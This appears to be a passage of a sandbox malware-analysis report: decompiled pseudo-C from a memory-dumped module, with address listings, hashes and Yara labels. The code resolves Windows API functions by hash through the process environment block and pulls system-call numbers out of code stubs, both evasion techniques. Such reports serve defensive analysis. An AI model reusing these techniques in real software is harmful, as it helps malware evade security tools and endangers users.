							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6F02F84C( &(_t535[0xc]), E6F02F4F0( &(_t535[8])) + 0x14);
								_t369 = E6F02F4E0( &(_t535[0xc]), E6F02F4F0( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6F02F678( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6F02F5A8( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6F02F678( &(_t535[8]));
							E6F02F678( &(_t535[0x164]));
							E6F02F5A8( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6F02F5A8( &(_t535[0x20]), 0);
							_push(0xfe338407);
							_t289 = E6F031D58(0xfe338407);
							_t290 = E6F031310( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6F031C90( &(_t535[0x164]), 0xfe338407);
							_t518 =  &(_t535[0x178]);
							E6F02D058( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6F035CAC( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6F035CE0( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6F038DE0( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6F02F678( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6F02BB88( &(_t535[0x110]));
							}
							E6F02D020( &(_t535[0x104]));
							E6F02D020(_t518);
							E6F02D020( &(_t535[0x15c]));
							E6F02D020( &(_t535[0x154]));
							E6F0390C4( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6F02F63C( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6F039088( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6F02F4E0( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6F02F4F0( &(_t535[0x44]));
								_t519 =  *(0x6f03bd40 + _t381 * 4);
								_t531 = E6F039054( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6F0387C0( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6F02F4F0( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6F02F500( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6F02F4F0( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6F02F84C( &(_t535[0x20]), E6F02F4F0( &(_t535[0x1c])) + 8);
										E6F02F4E0( &(_t535[0x20]), E6F02F4F0( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6F033154(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6F02F84C( &(_t535[0x48]), _t535[0x70]);
									E6F033154(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6F02F864( &(_t535[0x44]), _t563);
									E6F02F864( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6F039114( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6F0390DC( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6F02F678( &(_t535[0x144]));
									E6F02F678( &(_t535[0x134]));
									goto L38;
								}
								 *0x6f03d2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6F02F678( &(_t535[0x11c]));
							E6F038E40(_t381,  &(_t535[0xd8]));
							E6F02F678( &(_t535[0x1c]));
							E6F02F678( &(_t535[0x44]));
							E6F02F678( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6F02F4E0( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6F02F84C( &(_t535[0x38]), E6F02F4F0( &(_t535[0x34])) + 0x14);
							_t347 = E6F02F4E0( &(_t535[0x38]), E6F02F4F0( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6F02F4E0( &(_t535[0xc]), _t62);
						_t455 = E6F02F4E0( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6f03146c
0x6f031473
0x6f031476
0x6f03147d
0x6f031bff
0x6f031bff
0x6f031483
0x6f03148e
0x6f0319cd
0x6f0319d1
0x00000000
0x6f031c50
0x6f0319d7
0x6f0319da
0x6f0319dd
0x6f0319e7
0x6f0319f6
0x6f0319f8
0x6f0319ff
0x6f031be9
0x6f031beb
0x6f031bee
0x6f031bf2
0x00000000
0x6f031bf2
0x6f031a0e
0x6f031a19
0x6f031a20
0x6f031a23
0x6f031a25
0x6f031a28
0x6f031a2b
0x6f031a31
0x6f031a3f
0x6f031a4f
0x6f031a74
0x6f031a85
0x6f031a88
0x6f031a8a
0x6f031aee
0x6f031af1
0x6f031af1
0x6f031af3
0x6f031af6
0x6f031afa
0x6f031afa
0x6f031afe
0x00000000
0x00000000
0x6f031b0b
0x6f031b11
0x6f031b45
0x6f031b4b
0x6f031b4d
0x6f031c1c
0x6f031c24
0x6f031c27
0x6f031c29
0x6f031c40
0x6f031c40
0x6f031c2b
0x6f031c2f
0x6f031c34
0x6f031c34
0x6f031c42
0x6f031c48
0x6f031b67
0x6f031b67
0x6f031b69
0x6f031b69
0x6f031b6b
0x6f031b6b
0x6f031b70
0x00000000
0x00000000
0x6f031b72
0x6f031b73
0x6f031b76
0x6f031b79
0x00000000
0x00000000
0x6f031b85
0x6f031b88
0x6f031b8a
0x6f031ba1
0x6f031ba1
0x6f031b8c
0x6f031b90
0x6f031b95
0x6f031b95
0x6f031bae
0x6f031bb1
0x6f031bba
0x6f031bbd
0x6f031be0
0x6f031be4
0x00000000
0x6f031be4
0x6f031bc5
0x6f031bc5
0x6f031bd1
0x6f031bd4
0x6f031bdd
0x00000000
0x6f031bdd
0x6f031b53
0x6f031b53
0x6f031b63
0x6f031b63
0x6f031b65
0x00000000
0x00000000
0x6f031b5b
0x6f031b5d
0x6f031b5d
0x00000000
0x6f031b63
0x6f031b13
0x6f031b1b
0x6f031b3b
0x6f031b1d
0x6f031b1d
0x6f031b25
0x6f031b2e
0x6f031b2e
0x6f031b25
0x00000000
0x6f031b1b
0x6f031a8c
0x6f031a93
0x00000000
0x00000000
0x6f031aa0
0x6f031aa6
0x6f031aab
0x6f031ab2
0x6f031ab6
0x6f031acb
0x6f031acd
0x6f031acf
0x6f031ad5
0x6f031ae3
0x6f031ae3
0x6f031ae9
0x00000000
0x6f031ae9
0x00000000
0x00000000
0x00000000
0x00000000
0x6f031a33
0x6f031a33
0x6f031a33
0x6f031a34
0x6f031a37
0x6f031a3b
0x00000000
0x6f031a51
0x6f031a54
0x6f031a57
0x6f031a60
0x6f031a63
0x6f031a64
0x6f031a66
0x00000000
0x6f0314a1
0x6f0314a3
0x6f0314a8
0x6f0314b3
0x6f0314c1
0x6f0314d4
0x6f0314e1
0x6f0314ea
0x6f0314ee
0x6f0314f2
0x6f03153a
0x6f03153a
0x6f03153c
0x6f031543
0x00000000
0x00000000
0x6f03155c
0x6f031564
0x6f031568
0x6f03157d
0x6f031581
0x6f031585
0x6f03158e
0x6f031594
0x6f031597
0x6f03159b
0x6f0315a3
0x6f0315a5
0x6f0315a9
0x6f0315b0
0x6f0315b9
0x6f0315b9
0x6f0315bd
0x6f0315d2
0x6f0315e8
0x6f0315f5
0x6f0315f6
0x6f0315f6
0x6f0315f8
0x00000000
0x00000000
0x00000000
0x00000000
0x6f0315b2
0x6f0315b2
0x6f0315b2
0x6f0315b3
0x6f0315b4
0x00000000
0x6f0315b2
0x6f031577
0x6f03157b
0x00000000
0x00000000
0x00000000
0x6f0315fc
0x6f0315fc
0x6f0315fd
0x6f031600
0x6f03160a
0x6f03160a
0x6f03160e
0x6f031615
0x6f031670
0x6f031675
0x6f0316c8
0x6f0316c8
0x6f0316cc
0x6f0316d0
0x6f0314fa
0x6f0314fd
0x6f031502
0x6f031508
0x6f03150b
0x6f031512
0x6f031516
0x6f03151d
0x6f031526
0x6f03152a
0x6f03152e
0x6f031534
0x00000000
0x00000000
0x00000000
0x6f031534
0x6f0316da
0x6f0316e6
0x6f0316f1
0x6f0316f8
0x6f031701
0x6f03170b
0x6f03170c
0x6f03171a
0x6f03171f
0x6f031720
0x6f03172d
0x6f031732
0x6f031744
0x6f031749
0x6f03174e
0x6f031760
0x6f031772
0x6f031777
0x6f031782
0x6f031789
0x6f03178e
0x6f031796
0x6f03179f
0x6f03179f
0x6f0317ab
0x6f0317b2
0x6f0317be
0x6f0317ca
0x6f0317d8
0x6f0317e9
0x6f0317f0
0x6f0317f5
0x6f0317fe
0x6f031803
0x6f031805
0x6f031809
0x6f03180d
0x6f03181a
0x6f031827
0x6f03182b
0x6f03183f
0x6f031843
0x00000000
0x00000000
0x6f031858
0x6f03185a
0x6f031862
0x6f03185f
0x6f03185f
0x6f03185f
0x6f031866
0x6f031868
0x6f03186e
0x6f031874
0x6f0318d0
0x6f0318d9
0x6f0318dd
0x6f0318ea
0x6f0318f3
0x6f0318f8
0x6f0318fc
0x6f0318ff
0x6f031960
0x6f031976
0x6f031981
0x6f031982
0x6f031983
0x6f031987
0x6f03198a
0x6f031c0a
0x6f031c0d
0x6f031c0d
0x00000000
0x6f03198a
0x6f031909
0x6f031919
0x6f031922
0x6f03192b
0x6f031934
0x6f031935
0x6f031936
0x6f03193b
0x6f031943
0x6f03194b
0x00000000
0x00000000
0x00000000
0x6f03194d
0x6f03187d
0x6f031882
0x6f031886
0x6f031886
0x6f03188a
0x6f03188d
0x00000000
0x00000000
0x6f0318ae
0x6f0318b0
0x6f0318b4
0x6f0318b6
0x00000000
0x00000000
0x6f0318b8
0x6f0318bf
0x6f0318cb
0x00000000
0x6f0318cb
0x6f031892
0x00000000
0x6f031990
0x6f031990
0x6f031991
0x6f0319a1
0x6f0319ad
0x6f0319b6
0x6f0319bf
0x6f0319c8
0x00000000
0x6f0319c8
0x6f031677
0x6f031679
0x6f03167b
0x6f031680
0x6f031685
0x6f031698
0x6f0316ae
0x6f0316b7
0x6f0316b8
0x6f0316b8
0x6f0316ba
0x6f0316bb
0x6f0316be
0x6f0316c2
0x00000000
0x6f03167b
0x6f031617
0x6f031621
0x6f031622
0x6f031622
0x6f03162f
0x6f03163b
0x6f03163d
0x6f03163f
0x6f031643
0x6f031653
0x6f031653
0x6f03165a
0x6f03165d
0x6f03165e
0x6f031662
0x6f03166c
0x00000000
0x6f03166c

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95ebbd822256ffe80cbd98d04d341cc3b401a1cdf3226f9f3ec82a0ab7c0eee9
Instruction ID: 89ddcdddd5dc4d6815d7a493161676faadb2c578a757fa47ed589816f0feb8c1
Opcode Fuzzy Hash: 95ebbd822256ffe80cbd98d04d341cc3b401a1cdf3226f9f3ec82a0ab7c0eee9
Instruction Fuzzy Hash: 4E328E72A08356CFC714DF28C880BAEB7E5FF99348F10492DE595872A1EB70E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6F031D58, Relevance: .3, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E6F031D58(intOrPtr __eax) {
				void* _t72;
				intOrPtr _t74;
				signed int _t75;
				signed int _t76;
				signed char _t84;
				signed char _t86;
				signed char _t89;
				signed char _t92;
				signed char _t95;
				signed char* _t99;
				void* _t113;
				signed char _t114;
				signed char _t116;
				signed char _t118;
				intOrPtr _t119;
				signed char _t120;
				signed char _t127;
				signed char _t129;
				signed char _t130;
				signed char _t143;
				signed char _t145;
				signed char _t146;
				signed int _t147;
				signed char _t148;
				void* _t151;
				signed char _t155;
				signed char _t159;
				signed char _t165;
				signed char _t166;
				signed char _t167;
				signed char _t168;
				void* _t170;
				void* _t171;
				intOrPtr _t172;
				signed char _t173;
				intOrPtr _t174;
				intOrPtr* _t175;
				signed char _t176;
				signed char _t177;
				signed char _t178;
				signed char _t179;
				signed char* _t181;

				_t119 = __eax;
				_t143 =  *0x6f03d21c; // 0x4715c50
				if(_t143 == 0x76470dcb) {
					_t143 = 0;
					 *0x6f03d21c = 0;
				}
				if(_t119 != 0xfe338407) {
					L4:
					_t174 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
					if(_t119 != 0xa7e21d79) {
						while(1) {
							L10:
							__eflags = _t143;
							if(_t143 == 0) {
								break;
							}
							_t72 = 0;
							_t120 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t119 -  *((intOrPtr*)(_t120 + _t143 + 8));
								if(_t119 ==  *((intOrPtr*)(_t120 + _t143 + 8))) {
									break;
								}
								_t72 = _t72 + 1;
								_t120 = _t120 + 0x10;
								__eflags = _t72 - 0x10;
								if(_t72 < 0x10) {
									continue;
								}
								_t143 =  *(_t143 + 0x100);
								goto L10;
							}
							return  *((intOrPtr*)(_t120 + _t143 + 0xc));
						}
						__eflags = _t119 - 0x94e21d79;
						if(_t119 != 0x94e21d79) {
							_t74 =  *((intOrPtr*)(_t174 + 0xc));
							_t175 =  *((intOrPtr*)(_t74 + 0xc));
							_t181[4] =  *(_t74 + 0x10);
							while(1) {
								_t172 =  *((intOrPtr*)(_t175 + 0x30));
								_t75 = 0;
								__eflags = 0;
								while(1) {
									_t145 =  *(_t172 + _t75 * 2) & 0x0000ffff;
									_t181[0x1c + _t75 * 2] = _t145;
									__eflags = _t145;
									_t146 =  *(_t175 + 0x2c) & 0x0000ffff;
									if(_t145 == 0) {
										break;
									}
									_t75 = _t75 + 1;
									__eflags = _t75 - _t146;
									if(_t75 <= _t146) {
										continue;
									}
									break;
								}
								__eflags = _t146;
								_t147 = 0;
								if(_t146 <= 0) {
									L34:
									_t76 = E6F034FD4( &(_t181[0x13c]), _t147);
									__eflags = _t119 - (_t76 ^ 0x7af3da47);
									if(_t119 == (_t76 ^ 0x7af3da47)) {
										_t173 =  *(_t175 + 0x18);
										__eflags = _t173;
										if(_t173 == 0) {
											L55:
											return _t173;
										}
										L38:
										_t148 =  *0x6f03d2ec; // 0x0
										__eflags = _t148 |  *0x6f03d2ed;
										if((_t148 |  *0x6f03d2ed) == 0) {
											_t176 =  *0x6f03d21c; // 0x4715c50
											__eflags = _t176;
											if(_t176 == 0) {
												 *0x6f03d2ec = 1;
												_t177 = E6F0335F4(0x104);
												__eflags = _t177;
												if(_t177 == 0) {
													_t177 = 0;
													__eflags = 0;
													L62:
													 *0x6f03d21c = _t177;
													 *0x6f03d214 = E6F033044(0xfe338407, 0xb0386671, 0xfe338407, 0xfe338407);
													 *0x6f03d2ec = 0;
													L45:
													_t151 = 0;
													_t165 = 0;
													__eflags = 0;
													while(1) {
														__eflags =  *(_t165 + _t177 + 8);
														if( *(_t165 + _t177 + 8) == 0) {
															break;
														}
														_t151 = _t151 + 1;
														_t165 = _t165 + 0x10;
														__eflags = _t151 - 0x10;
														if(_t151 < 0x10) {
															continue;
														}
														_t84 = E6F0335F4(0x104);
														_t181[4] = _t84;
														__eflags =  *_t181;
														if( *_t181 == 0) {
															 *_t181 = 0;
															L53:
															 *( *_t181 + 0xc) = _t173;
															E6F02D03C( *_t181,  &(_t181[0x1c]));
															_t155 =  *_t181;
															 *((intOrPtr*)(_t155 + 8)) = _t119;
															 *(_t177 + 0x100) = _t155;
															goto L55;
														}
														_t167 = _t84;
														_t86 = 0x10;
														do {
															_t181[0x13c] = _t86;
															E6F02CFC8(_t167, 0);
															 *((intOrPtr*)(_t167 + 8)) = 0;
															 *((intOrPtr*)(_t167 + 0xc)) = 0;
															_t167 = _t167 + 0x10;
															_t86 = _t181[0x138] - 1;
															__eflags = _t86;
														} while (_t86 != 0);
														 *( *_t181 + 0x100) = 0;
														goto L53;
													}
													_t166 = _t165 + _t177;
													__eflags = _t166;
													 *(_t166 + 0xc) = _t173;
													E6F02D03C(_t166,  &(_t181[0x1c]));
													 *((intOrPtr*)(_t166 + 8)) = _t119;
													goto L55;
												}
												_t168 = _t177;
												_t89 = 0x10;
												do {
													_t181[4] = _t89;
													E6F02CFC8(_t168, 0);
													 *((intOrPtr*)(_t168 + 8)) = 0;
													 *((intOrPtr*)(_t168 + 0xc)) = 0;
													_t168 = _t168 + 0x10;
													_t89 =  *_t181 - 1;
													__eflags = _t89;
												} while (_t89 != 0);
												 *(_t177 + 0x100) = 0;
												goto L62;
											}
											_t159 =  *(_t176 + 0x100);
											while(1) {
												__eflags = _t159;
												if(_t159 == 0) {
													goto L45;
												}
												_t177 = _t159;
												_t159 =  *(_t159 + 0x100);
											}
											goto L45;
										}
										__eflags = _t119 - 0xfe338407;
										if(_t119 == 0xfe338407) {
											 *0x6f03d220 = _t173;
										}
										goto L55;
									}
									__eflags = _t175 - _t181[4];
									if(_t175 != _t181[4]) {
										_t175 =  *_t175;
										continue;
									}
									L36:
									_t173 = 0;
									goto L55;
								}
								_t92 = 0;
								__eflags = 0;
								while(1) {
									_t126 =  *((char*)(_t172 + _t147 * 2));
									 *_t181 = _t92;
									_t39 = _t126 - 0x41; // -81
									__eflags = _t39 - 0x19;
									_t40 = _t126 + 0x20; // 0x10
									_t127 =  <=  ? _t40 :  *((char*)(_t172 + _t147 * 2));
									_t181[_t147 + 0x13c] = _t127;
									_t95 =  *_t181;
									__eflags = _t127;
									if(_t127 == 0) {
										goto L34;
									}
									_t92 = _t95 + 1;
									_t147 = _t147 + 1;
									__eflags = _t92 - ( *(_t175 + 0x2c) & 0x0000ffff);
									if(_t92 < ( *(_t175 + 0x2c) & 0x0000ffff)) {
										continue;
									}
									goto L34;
								}
								goto L34;
							}
						}
						_t170 = E6F039A00();
						_t178 = 0;
						while(1) {
							_t129 = E6F033044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t129;
							if(_t129 == 0) {
								goto L16;
							}
							_t116 =  *_t129(0xffffffff, _t178, 0,  &(_t181[0x11c]), 0x1c, 0);
							__eflags = _t116;
							if(_t116 != 0) {
								goto L36;
							}
							L16:
							_t99 =  &(_t181[0x120]);
							_t173 =  *_t99;
							_t130 = _t99[8];
							__eflags = _t173 - _t170;
							if(_t173 > _t170) {
								L13:
								_t178 = _t178 + _t130;
								__eflags = _t178;
								continue;
							}
							__eflags = _t130 + _t173 - _t170;
							if(_t130 + _t173 <= _t170) {
								goto L13;
							}
							__eflags = _t173;
							if(_t173 == 0) {
								goto L55;
							}
							E6F02F5A8( &(_t181[0x10]), 0x400);
							_t171 = E6F02F4E0( &(_t181[0x10]), 0);
							_t179 = E6F033044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t179;
							if(_t179 == 0) {
								L21:
								E6F02D000( &(_t181[0xc]),  *((intOrPtr*)(_t171 + 4)), 0);
								__eflags = E6F02D210( &(_t181[8]), 0x5c);
								if(__eflags != 0) {
									_push(0x5c);
									E6F02D650( &(_t181[0xc]), __eflags,  &(_t181[0x1bc]));
									E6F02D03C( &(_t181[8]), _t181[0x1bc]);
									E6F02D020( &(_t181[0x1bc]));
								}
								E6F02DE70( &(_t181[0x20]), _t181[4], 0);
								E6F02D020( &(_t181[4]));
								L24:
								E6F02F678( &(_t181[0xc]));
								goto L38;
							}
							 *_t181 = E6F02F4E0( &(_t181[0x10]), 0);
							_t113 = E6F02F4F0( &(_t181[0xc]));
							_t114 =  *_t179(0xffffffff, _t173, 2, _t181[8], _t113, 0);
							__eflags = _t114;
							if(_t114 != 0) {
								goto L24;
							}
							goto L21;
						}
					}
					return  *((intOrPtr*)(_t174 + 8));
				} else {
					_t118 =  *0x6f03d220; // 0x77df0000
					if(_t118 != 0xe86b6198) {
						return _t118;
					}
					goto L4;
				}
			}

0x6f031d62
0x6f031d64
0x6f031d70
0x6f031d72
0x6f031d74
0x6f031d74
0x6f031d80
0x6f031d92
0x6f031d98
0x6f031da1
0x6f031dc8
0x6f031dc8
0x6f031dc8
0x6f031dca
0x00000000
0x00000000
0x6f031dab
0x6f031dad
0x6f031dad
0x6f031daf
0x6f031daf
0x6f031db3
0x00000000
0x00000000
0x6f031db9
0x6f031dba
0x6f031dbd
0x6f031dc0
0x00000000
0x00000000
0x6f031dc2
0x00000000
0x6f031dc2
0x00000000
0x6f0320f1
0x6f031dcc
0x6f031dd2
0x6f031efe
0x6f031f04
0x6f031f07
0x6f031f10
0x6f031f10
0x6f031f13
0x6f031f13
0x6f031f15
0x6f031f15
0x6f031f19
0x6f031f1e
0x6f031f20
0x6f031f24
0x00000000
0x00000000
0x6f031f26
0x6f031f27
0x6f031f29
0x00000000
0x00000000
0x00000000
0x6f031f29
0x6f031f2b
0x6f031f2f
0x6f031f30
0x6f031f62
0x6f031f69
0x6f031f73
0x6f031f75
0x6f031f84
0x6f031f87
0x6f031f89
0x6f032071
0x00000000
0x6f032071
0x6f031f8f
0x6f031f8f
0x6f031f95
0x6f031f9b
0x6f031fb4
0x6f031fba
0x6f031fbc
0x6f032085
0x6f032091
0x6f032094
0x6f032096
0x6f0320c7
0x6f0320c7
0x6f0320c9
0x6f0320d5
0x6f0320e0
0x6f0320e5
0x6f031fd6
0x6f031fd6
0x6f031fd8
0x6f031fd8
0x6f031fda
0x6f031fda
0x6f031fdf
0x00000000
0x00000000
0x6f031fe1
0x6f031fe2
0x6f031fe5
0x6f031fe8
0x00000000
0x00000000
0x6f031fef
0x6f031ff4
0x6f031ff9
0x6f031ffd
0x6f032038
0x6f03203f
0x6f032047
0x6f03204a
0x6f03204f
0x6f032052
0x6f032055
0x00000000
0x6f032055
0x6f031fff
0x6f032003
0x6f032004
0x6f032008
0x6f03200f
0x6f03201d
0x6f032020
0x6f032023
0x6f032026
0x6f032026
0x6f032026
0x6f03202c
0x00000000
0x6f03202c
0x6f03205d
0x6f03205d
0x6f032066
0x6f032069
0x6f03206e
0x00000000
0x6f03206e
0x6f032098
0x6f03209c
0x6f03209d
0x6f0320a1
0x6f0320a5
0x6f0320af
0x6f0320b2
0x6f0320b5
0x6f0320b8
0x6f0320b8
0x6f0320b8
0x6f0320bb
0x00000000
0x6f0320bb
0x6f031fc2
0x6f031fd2
0x6f031fd2
0x6f031fd4
0x00000000
0x00000000
0x6f031fca
0x6f031fcc
0x6f031fcc
0x00000000
0x6f031fd2
0x6f031f9d
0x6f031fa3
0x6f031fa9
0x6f031fa9
0x00000000
0x6f031fa3
0x6f031f77
0x6f031f7b
0x6f031f0d
0x00000000
0x6f031f0d
0x6f031f7d
0x6f031f7d
0x00000000
0x6f031f7d
0x6f031f32
0x6f031f32
0x6f031f34
0x6f031f34
0x6f031f38
0x6f031f3b
0x6f031f3e
0x6f031f41
0x6f031f47
0x6f031f4a
0x6f031f51
0x6f031f54
0x6f031f56
0x00000000
0x00000000
0x6f031f58
0x6f031f59
0x6f031f5e
0x6f031f60
0x00000000
0x00000000
0x00000000
0x6f031f60
0x00000000
0x6f031f34
0x6f031f10
0x6f031ddd
0x6f031ddf
0x6f031de5
0x6f031df6
0x6f031df8
0x6f031dfa
0x00000000
0x00000000
0x6f031e0d
0x6f031e0f
0x6f031e11
0x00000000
0x00000000
0x6f031e17
0x6f031e17
0x6f031e1e
0x6f031e20
0x6f031e23
0x6f031e25
0x6f031de3
0x6f031de3
0x6f031de3
0x00000000
0x6f031de3
0x6f031e2a
0x6f031e2c
0x00000000
0x00000000
0x6f031e2e
0x6f031e30
0x00000000
0x00000000
0x6f031e3f
0x6f031e4f
0x6f031e62
0x6f031e64
0x6f031e66
0x6f031e91
0x6f031e9a
0x6f031eaa
0x6f031eac
0x6f031eb5
0x6f031ebc
0x6f031ecc
0x6f031ed3
0x6f031ed3
0x6f031ee2
0x6f031eeb
0x6f031ef0
0x6f031ef4
0x00000000
0x6f031ef4
0x6f031e73
0x6f031e7a
0x6f031e8b
0x6f031e8d
0x6f031e8f
0x00000000
0x00000000
0x00000000
0x6f031e8f
0x6f031de5
0x00000000
0x6f031d82
0x6f031d82
0x6f031d8c
0x6f03207d
0x6f03207d
0x00000000
0x6f031d8c

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0075e5556b09ddbceb5560f0676fab71883536c7ca547c8f9c87931c1f5e1b74
Instruction ID: 13d2f6f72be7c23b2745985f380e5e0b0a4d237378e163e9e75b0847a2a5ae74
Opcode Fuzzy Hash: 0075e5556b09ddbceb5560f0676fab71883536c7ca547c8f9c87931c1f5e1b74
Instruction Fuzzy Hash: 94A10832E087169FD714DF29C880BAEB3E6BF89714F60C929E4548B291D735E845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6F026D50, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F026D50() {

				 *0x6f03d280 = GetUserNameW;
				 *0x6F03D284 = MessageBoxW;
				 *0x6F03D288 = GetLastError;
				 *0x6F03D28C = CreateFileA;
				 *0x6F03D290 = DebugBreak;
				 *0x6F03D294 = FlushFileBuffers;
				 *0x6F03D298 = FreeEnvironmentStringsA;
				 *0x6F03D29C = GetConsoleOutputCP;
				 *0x6F03D2A0 = GetEnvironmentStrings;
				 *0x6F03D2A4 = GetLocaleInfoA;
				 *0x6F03D2A8 = GetStartupInfoA;
				 *0x6F03D2AC = GetStringTypeA;
				 *0x6F03D2B0 = HeapValidate;
				 *0x6F03D2B4 = IsBadReadPtr;
				 *0x6F03D2B8 = LCMapStringA;
				 *0x6F03D2BC = LoadLibraryA;
				 *0x6F03D2C0 = OutputDebugStringA;
				return 0x6f03d280;
			}

0x6f026d61
